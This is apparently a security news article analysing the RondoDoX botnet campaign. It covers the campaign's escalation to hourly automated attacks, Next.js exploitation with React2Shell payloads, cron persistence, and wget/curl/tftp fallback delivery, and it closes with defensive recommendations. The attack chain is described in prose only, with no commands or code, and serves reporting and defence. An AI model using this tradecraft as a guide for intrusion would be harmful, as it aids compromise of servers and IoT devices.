A highly sophisticated cyber-threat group has demonstrated a dramatic escalation in its campaign tactics, rapidly evolving from manual probing to hourly automated attacks against global enterprise infrastructure. An extensive analysis of the group’s command-and-control server logs from March through December of 2025 has uncovered a persistent and increasingly aggressive campaign deploying the RondoDoX botnet. This operation, which targets vulnerabilities in web applications and Internet of Things (IoT) devices, progressed through three distinct phases. Initially, the attackers relied on manual vulnerability testing to identify potential targets. However, by April 2025, they had shifted to a more efficient model of automated daily scanning. This methodical approach culminated in a final, highly aggressive phase beginning in July 2025, where the threat actors escalated their efforts to launching hourly payload deployment attempts. This significant increase in frequency and automation signals a well-resourced and determined adversary focused on maximizing its footprint across diverse network environments to deploy cryptominers and other malicious payloads.
The Evolving Attack Vector and Arsenal
The campaign’s most alarming development materialized late last year when the threat actors weaponized a critical vulnerability in Next.js to deliver potent React2Shell payloads, showcasing their agility in adopting newly disclosed flaws. The attack chain is initiated with broad-based scanning to identify vulnerable servers through blind remote code execution tests, a technique that allows them to confirm weaknesses without generating overt alerts. Once a susceptible server is found, the attackers deploy tailored ELF binaries designed to download the primary malicious payloads from a network of at least six confirmed command-and-control (C2) servers. This rapid exploitation of a zero-day vulnerability highlights the group’s advanced capabilities and their commitment to staying ahead of defensive measures. The use of multiple C2 servers provides redundancy and resilience, making the infrastructure difficult to disrupt and underscoring the sophisticated operational planning behind the RondoDoX botnet’s deployment strategy.
Once a system is compromised, the RondoDoX malware showcases a formidable set of capabilities designed for long-term persistence and resource monopolization. To ensure it remains active after a system reboot, the botnet establishes persistence by configuring cron jobs, which schedule the malware to run at regular intervals. Furthermore, it aggressively seeks out and terminates any competing malware or resource-intensive processes, a tactic designed to monopolize the infected system’s CPU and memory for its own operations, primarily cryptomining. To maximize its reach, the malware is compiled to support a wide array of processor architectures, including x86, x86_64, MIPS, ARM, and PowerPC, enabling it to infect everything from standard servers to specialized IoT devices. It also employs several fallback mechanisms, such as wget, curl, tftp, and ftp, to guarantee successful payload delivery even in restrictive network environments, demonstrating a high degree of resilience and adaptability.
Fortifying Defenses Against an Agile Threat
The successful defense against the RondoDoX campaign hinged on a multi-layered security strategy that addressed both immediate vulnerabilities and long-term resilience. Organizations that effectively mitigated this threat were those that prioritized immediate patching of all internet-facing applications, particularly those utilizing Next.js Server Actions, as well as vulnerable routers and cameras that served as common entry points. Network segmentation proved critical in containing the malware’s lateral movement, preventing a localized breach from becoming a network-wide incident. The deployment of robust Web Application Firewalls (WAFs) provided an essential layer of protection by filtering and blocking malicious traffic aimed at exploiting application vulnerabilities. Furthermore, continuous monitoring for suspicious processes, especially those executing from temporary directories like /tmp, was instrumental in the early detection of infection attempts. As a crucial short-term defense, the proactive blocking of IP addresses associated with the identified C2 servers at perimeter firewalls successfully thwarted active exploitation and cut off communication channels for already compromised devices.
